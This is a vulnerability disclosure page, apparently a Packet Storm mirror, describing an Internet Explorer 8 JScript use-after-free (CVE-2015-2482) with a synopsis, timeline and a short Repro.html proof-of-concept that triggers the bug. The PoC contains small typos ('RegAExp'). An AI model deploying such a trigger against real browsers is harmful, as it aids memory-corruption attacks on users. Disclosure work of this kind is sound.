Microsoft Internet Explorer 8 Javascript RegExpBase::FBadHeader Use-After-Free

🗓️ 16 Nov 2016 00:00:00Reported by SkyLinedType

packetstorm🔗 packetstormsecurity.com👁 55 Views

MSIE 8 Javascript RegExpBase::FBadHeader Use-After-Free vulnerability details

Reporter	Title	Published	Views	Family All 19
0day.today	Microsoft Internet Explorer 8 jscript - 'RegExpBase::FBadHeader' Use-After-Free (MS15	23 Nov 201600:00	–	zdt
Circl	CVE-2015-2482	18 Nov 201610:20	–	circl
CNVD	Microsoft VBScript and JScript Engine Memory Corruption Vulnerability	15 Oct 201500:00	–	cnvd
CVE	CVE-2015-2482	14 Oct 201501:00	–	cve
Cvelist	CVE-2015-2482	14 Oct 201501:00	–	cvelist
Microsoft KB	MS15-108: Security update for JScript and VBScript to address remote code execution: October 13, 2015	13 Oct 201500:00	–	mskb
Microsoft KB	MS15-106: Cumulative security update for Internet Explorer: October 13, 2015	13 Oct 201500:00	–	mskb
Kaspersky	KLA10676 Multiple vulnerabilities in Microsoft JScript and VBScript	13 Oct 201500:00	–	kaspersky
Kaspersky	KLA10677 Multiple vulnerabilities in Microsoft Internet Explorer	13 Oct 201500:00	–	kaspersky
NVD	CVE-2015-2482	14 Oct 201501:59	–	nvd

`Throughout November, I plan to release details on vulnerabilities I  
found in web-browsers which I've not released before. This is the  
twelfth entry in that series. Unfortunately I won't be able to publish  
everything within one month at the current rate, so I may continue to  
publish these through December and January.  
  
The below information is available in more detail on my blog at  
http://blog.skylined.nl/20161116001.html.  
  
Follow me on http://twitter.com/berendjanwever for daily browser bugs.  
  
MSIE 8 jscript RegExpBase::FBadHeader use-after-free  
====================================================  
(MS15-018, CVE-2015-2482)  
  
Synopsis  
--------  
A specially crafted web-page can cause the Javascript engine of  
Microsoft Internet Explorer 8 to free memory used for a string. The code  
will keep a reference to the string and can be forced to reuse it when  
compiling a regular expression.  
  
Known affected software, attack vectors and mitigations  
-------------------------------------------------------  
* Microsoft Internet Explorer 8  
An attacker would need to get a target user to open a specially  
crafted web-page. Disabling Javascript should prevent an attacker  
from triggering the vulnerable code path.  
  
Description  
-----------  
Recompiling the regular expression pattern during a replace can cause  
the code to reuse a freed string, but only if the string is freed from  
the cache by allocating and freeing a number of strings of certain size,  
as explained by Alexander Sotirov in his Heap Feng-Shui presentation.  
  
Exploit  
-------  
Exploitation was not investigated.  
  
Time-line  
---------  
* *March 2015*: This vulnerability was found through fuzzing.  
* *March 2015*: This vulnerability was submitted to ZDI.  
* *April 2015*: This vulnerability was acquired by ZDI.  
* *October 2015*: Microsoft addressed this issue in MS15-018.  
* *November 2016*: Details of this issue are released.  
  
Cheers,  
  
SkyLined  
  
  
Repro.html  
  
<!DOCTYPE html>  
<html>  
<script>  
// This PoAC attempts to exploit a use-after-free bug in Microsoft Internet  
// Explorer 8.  
// See http://blog.skylined.nl/20161116001.html for details.  
var r=new RegAExp("A|x|x|xx|xxxxxxxxxxxxxxxxxxxx+", "g");  
"A".replace(r, function (){  
// Force OLEAUT32 to free the string  
for (var j = 0; j < 16; j++) new Array(0x1000).join("B");  
// Reuse the freed memory  
r.compile();  
});  
// This work by SkyALined is licensed under a Creative Commons  
// Attribution-Non-Commercial 4.0 International License.   
</script>  
</html>  
  
`

16 Nov 2016 00:00Current

8.1High risk

Vulners AI Score8.1

EPSS0.64097